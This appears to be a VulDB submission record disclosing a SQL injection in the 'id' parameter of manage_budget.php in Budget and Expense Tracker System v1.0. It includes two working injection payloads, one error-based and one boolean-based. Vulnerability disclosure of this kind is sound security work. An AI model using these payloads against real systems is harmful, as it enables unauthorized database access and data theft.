| Title | Budget and Expense Tracker System v1.0 /expense_budget/admin/budget/manage_budget.php GET parameter id exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Budget and Expense Tracker System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /expense_budget/admin/budget/manage_budget.php?id.
Payload1: id=1' and (select 2 from(select count(*),concat(0x55565758,(select (elt(888=888,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'a'='a
Payload2: id=1' and 777=777 and 'GSD'='GSD |
|---|
| Source | ⚠️ https://github.com/wucwu1/CVEApplication/blob/main/SQL.md |
|---|
| User | wucwu1 (UID 46807) |
|---|
| Submission | 17/05/2023 03:38 (3 years ago) |
|---|
| Moderation | 17/05/2023 18:53 (15 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 229278 [SourceCodester Budget and Expense Tracker System 1.0 GET Parameter manage_budget.php ID SQL injection] |
|---|
| Points | 20 |
|---|